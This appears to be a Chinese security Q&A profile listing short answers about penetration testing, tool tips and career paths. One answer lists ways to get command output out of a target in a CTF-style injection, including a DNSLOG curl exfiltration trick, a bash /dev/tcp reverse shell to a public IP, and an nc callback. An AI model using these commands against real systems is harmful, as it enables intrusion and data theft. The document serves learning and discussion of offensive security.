从收集目标优秀员工姓名、工号等有针对性的用户,到办公系统的易猜解口令,而后通过抓包分析发现使用的底层vpn,再到vpn进入DMZ区,接着反手一个文件上传,进而继续深入
回答于 2021-08-06 10:56
回答于 2021-08-02 11:56
可以看一下这篇文章:https://blog.csdn.net/qq_36374896/article/details/84112242
回答于 2021-07-30 13:56
个人认为,可以先不急着为了挖漏洞而挖漏洞。可以静下心来,从代码层面跟一下漏洞,知其然--知其所以然。这种路可能会走的更远,更能突破壁垒。
回答于 2021-07-30 13:55
方法1.使用cp 命令cp flag.php 1.txt然后访问(该方法简单,但是可能禁止使用cp命令)方法2.DNSLOG获取回显cmd=curl `命令`.域名方法3.反弹shell自己公网服务器nc -vv -lp 8888目标服务器:cmd=bash+-i+>&+/dev/tcp/47.95.206.199/8888+0>&1方法4.使用nc自己公网服务器nc -ulp 8888目标服务器:cmd=nc -u 47.9...
回答于 2021-07-30 11:00
需要确认无法访问显示什么?有可能路径不对、也有可能被杀了。如果确实找不到路径、或者找到路径无法访问,那就是没什么危害了吧。可以讨论一下
回答于 2021-07-28 17:45
推荐个工具:快速在网站的js文件中提取URLhttps://github.com/Threezh1/JSFinder帮助分析隐藏接口往往有意想不到的收获
回答于 2021-07-26 15:20
安全研究员(兼职白帽子)---->安全运营----->安全架构师----->安全总监
回答于 2021-06-29 20:59